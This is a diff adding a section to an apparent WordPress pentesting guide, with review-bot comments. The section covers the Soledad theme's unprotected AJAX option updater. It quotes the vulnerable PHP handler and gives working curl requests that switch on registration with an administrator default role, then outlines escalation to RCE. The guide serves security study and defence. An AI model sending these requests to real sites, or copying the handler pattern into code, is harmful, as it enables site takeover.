37 changes: 37 additions & 0 deletions src/network-services-pentesting/pentesting-web/wordpress.md
@@ -409,6 +409,42 @@ The `permission_callback` is a callback to function that checks if a given user

Of course, Wordpress uses PHP and files inside plugins are directly accessible from the web. So, in case a plugin is exposing any vulnerable functionality that is triggered just accessing the file, it's going to be exploitable by any user.

### WordPress AJAX option updaters without capability checks

Themes often register authenticated `admin-ajax.php` actions that write directly to the options table via `update_option()` / `update_site_option()` based solely on untrusted POST parameters. If the handler only calls `check_ajax_referer()` (anti-CSRF) and omits capability enforcement, any Subscriber+ user that can load `/wp-admin/` can steal the nonce rendered in the dashboard and flip security-sensitive options. The Soledad theme (≤ 8.6.9) shipped the following pattern ([details](https://patchstack.com/articles/privilege-escalation-vulnerability-in-soledad-theme-affecting-50k-sites/)):

```php
public function penci_update_option() {
check_ajax_referer( 'ajax-nonce', 'nonce' );
$name = sanitize_text_field( wp_unslash( $_POST['option_name'] ) );
$val = wp_unslash( $_POST['option_val'] );
if ( $name && $val ) {
update_option( $name, $val );
wp_send_json_success();
}
}
```

**Exploitation flow (Subscriber → Administrator):**

1. Authenticate as a low-privileged user and capture the nonce used by the vulnerable action from the page source or the Network tab.
2. Send crafted AJAX requests that toggle global registration options:

```bash
curl -X POST https://victim/wp-admin/admin-ajax.php \
-b 'wordpress_logged_in=...' \
-d 'action=penci_update_option&nonce=<ajax-nonce>&option_name=users_can_register&option_val=1'

curl -X POST https://victim/wp-admin/admin-ajax.php \
-b 'wordpress_logged_in=...' \
-d 'action=penci_update_option&nonce=<ajax-nonce>&option_name=default_role&option_val=administrator'
```

3. Visit `/wp-login.php?action=register` (or any exposed registration form) and create a new account — it inherits the Administrator role because `users_can_register=1` and `default_role=administrator`.
4. Abuse admin privileges to upload/edit plugins or themes and achieve RCE.

The vulnerability exists because the action trusts a nonce but never enforces `current_user_can('manage_options')`, so any logged-in role that can steal the nonce can rewrite arbitrary options and pivot to RCE.

### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)

Some plugins implement “trusted header” shortcuts for internal integrations or reverse proxies and then use that header to set the current user context for REST requests. If the header is not cryptographically bound to the request by an upstream component, an attacker can spoof it and hit privileged REST routes as an administrator.
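Review bot: The closing sentence of the new section names `current_user_can('manage_options')` as the one missing control, but the snippet has two further defects the text should spell out: `$val` reaches `update_option()` with no sanitization at all (`wp_unslash()` only strips slashes), and `$name` is attacker-chosen, so even with a capability check the handler remains an arbitrary option writer. Suggest a line after the code saying the correct fix is a capability check plus an allowlist of the option names the theme actually owns, and that the reviewable pattern is `check_ajax_referer()` directly followed by `update_option( $_POST[...] )` with no `current_user_can()` in between. The version range `≤ 8.6.9` is also given without the fixed version; state it if the linked advisory provides one.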
@@ -931,5 +967,6 @@ Hardening
- [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability)
- [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability)
- [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability)
- [Privilege Escalation Vulnerability in Soledad Theme Affecting 50k+ Sites](https://patchstack.com/articles/privilege-escalation-vulnerability-in-soledad-theme-affecting-50k-sites/)

{{#include ../../banners/hacktricks-training.md}}
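Review bot: The added Soledad reference does not follow the format of the three entries above it (`<Component> ≤ <version> – <impact> (Patchstack DB)`), which makes the list harder to scan; suggest `- [Soledad Theme ≤ 8.6.9 – Authenticated (Subscriber+) privilege escalation via unprotected AJAX option update (Patchstack)](...)` with the same URL. The URL is already linked inline in the new section, so this entry is a duplicate pointer, which is acceptable for the references list as long as the wording stays consistent with the section title.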